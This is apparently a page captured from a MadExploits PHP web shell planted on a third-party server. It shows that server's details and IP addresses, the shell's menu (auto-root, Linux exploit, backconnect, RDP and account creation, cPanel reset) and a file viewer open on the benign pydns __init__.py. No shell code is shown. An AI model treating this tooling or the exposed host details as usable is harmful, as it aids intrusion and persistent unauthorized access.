Linux server.kiran-academy.com 3.10.0-1160.108.1.el7.x86_64 #1 SMP Thu Jan 25 16:17:31 UTC 2024 x86_64
Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
: 194.233.91.196 | : 216.73.216.216
Cant Read [ /etc/named.conf ]
7.4.32
finalho
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
lib /
python2.7 /
site-packages /
DNS /
[ HOME SHELL ]
Name
Size
Permission
Action
Base.py
17.35
KB
-rw-r--r--
Base.pyc
11.87
KB
-rw-r--r--
Base.pyo
11.87
KB
-rw-r--r--
Class.py
1.43
KB
-rw-r--r--
Class.pyc
855
B
-rw-r--r--
Class.pyo
855
B
-rw-r--r--
Lib.py
23.32
KB
-rw-r--r--
Lib.pyc
24.6
KB
-rw-r--r--
Lib.pyo
24.6
KB
-rw-r--r--
Opcode.py
1.15
KB
-rw-r--r--
Opcode.pyc
901
B
-rw-r--r--
Opcode.pyo
901
B
-rw-r--r--
Status.py
2.29
KB
-rw-r--r--
Status.pyc
1.17
KB
-rw-r--r--
Status.pyo
1.17
KB
-rw-r--r--
Type.py
2.48
KB
-rw-r--r--
Type.pyc
1.25
KB
-rw-r--r--
Type.pyo
1.25
KB
-rw-r--r--
__init__.py
2.11
KB
-rw-r--r--
__init__.pyc
502
B
-rw-r--r--
__init__.pyo
502
B
-rw-r--r--
lazy.py
2.95
KB
-rw-r--r--
lazy.pyc
1.94
KB
-rw-r--r--
lazy.pyo
1.94
KB
-rw-r--r--
win32dns.py
4.88
KB
-rw-r--r--
win32dns.pyc
3.4
KB
-rw-r--r--
win32dns.pyo
3.4
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : __init__.py
# -*- encoding: utf-8 -*- # $Id: __init__.py,v 1.8.2.10 2012/02/03 23:04:01 customdesigned Exp $ # # This file is part of the pydns project. # Homepage: http://pydns.sourceforge.net # # This code is covered by the standard Python License. See LICENSE for details. # # __init__.py for DNS class. __version__ = '2.3.6' import Type,Opcode,Status,Class from Base import DnsRequest, DNSError from Lib import DnsResult from Base import * from Lib import * Error=DNSError from lazy import * Request = DnsRequest Result = DnsResult # # $Log: __init__.py,v $ # Revision 1.8.2.10 2012/02/03 23:04:01 customdesigned # Release 2.3.6 # # Revision 1.8.2.9 2011/03/16 20:06:39 customdesigned # Refer to explicit LICENSE file. # # Revision 1.8.2.8 2011/03/03 21:57:15 customdesigned # Release 2.3.5 # # Revision 1.8.2.7 2009/06/09 18:05:29 customdesigned # Release 2.3.4 # # Revision 1.8.2.6 2008/08/01 04:01:25 customdesigned # Release 2.3.3 # # Revision 1.8.2.5 2008/07/28 02:11:07 customdesigned # Bump version. # # Revision 1.8.2.4 2008/07/28 00:17:10 customdesigned # Randomize source ports. # # Revision 1.8.2.3 2008/07/24 20:10:55 customdesigned # Randomize tid in requests, and check in response. # # Revision 1.8.2.2 2007/05/22 21:06:52 customdesigned # utf-8 in __init__.py # # Revision 1.8.2.1 2007/05/22 20:39:20 customdesigned # Release 2.3.1 # # Revision 1.8 2002/05/06 06:17:49 anthonybaxter # found that the old README file called itself release 2.2. So make # this one 2.3... # # Revision 1.7 2002/05/06 06:16:15 anthonybaxter # make some sort of reasonable version string. releasewards ho! # # Revision 1.6 2002/03/19 13:05:02 anthonybaxter # converted to class based exceptions (there goes the python1.4 compatibility :) # # removed a quite gross use of 'eval()'. # # Revision 1.5 2002/03/19 12:41:33 anthonybaxter # tabnannied and reindented everything. 4 space indent, no tabs. # yay. # # Revision 1.4 2001/11/26 17:57:51 stroeder # Added __version__ # # Revision 1.3 2001/08/09 09:08:55 anthonybaxter # added identifying header to top of each file # # Revision 1.2 2001/07/19 06:57:07 anthony # cvs keywords added # #
Close